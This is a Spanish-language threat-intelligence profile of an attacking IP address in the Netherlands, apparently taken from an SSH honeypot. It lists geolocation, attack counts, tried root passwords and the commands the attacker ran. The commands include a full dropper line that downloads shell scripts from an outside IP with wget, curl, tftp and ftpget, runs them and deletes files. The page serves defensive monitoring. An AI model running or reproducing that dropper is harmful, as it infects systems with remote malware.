Amenaza ActivaMEDIO

45.156.87.204

Pais de Origen🇳🇱 Paises Bajos
Primera Deteccion8/1/2026
Ultima Actividad12/1/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
336
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
3
Malware

Geolocalizacion

Pais
🇳🇱 Paises Bajos
Ciudad
Eygelshoven
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Tipos de Ataque

cowrie

Puertos Atacados

22

Malware Asociado

Credenciales Intentadas

🔐root/root
6x
🔐root/admin
4x
🔐root/admin12345
2x
🔐root/root123
2x
🔐root/YYY@123
1x
🔐root/JJJ@123
1x
🔐root/kshkshsk
1x
🔐root/CC@123
1x
🔐root/Qwerty111
1x
🔐root/OO@123
1x
🔐root/UUU@123
1x
🔐root/BB@123
1x
🔐root/VV@123
1x
🔐root/TT@123
1x
🔐root/RRR@123
1x

Comandos Ejecutados

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.1.31.174/1.sh; curl -O http://202.1.31.174/1.sh; chmod 777 1.sh; sh 1.sh; tftp 202.1.31.174 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 202.1.31.174; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 202.1.31.174 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *2x
$history | tail -51x
$ssh -V1x

Evaluacion de Riesgo

57
/100
BajoMedioAltoCritico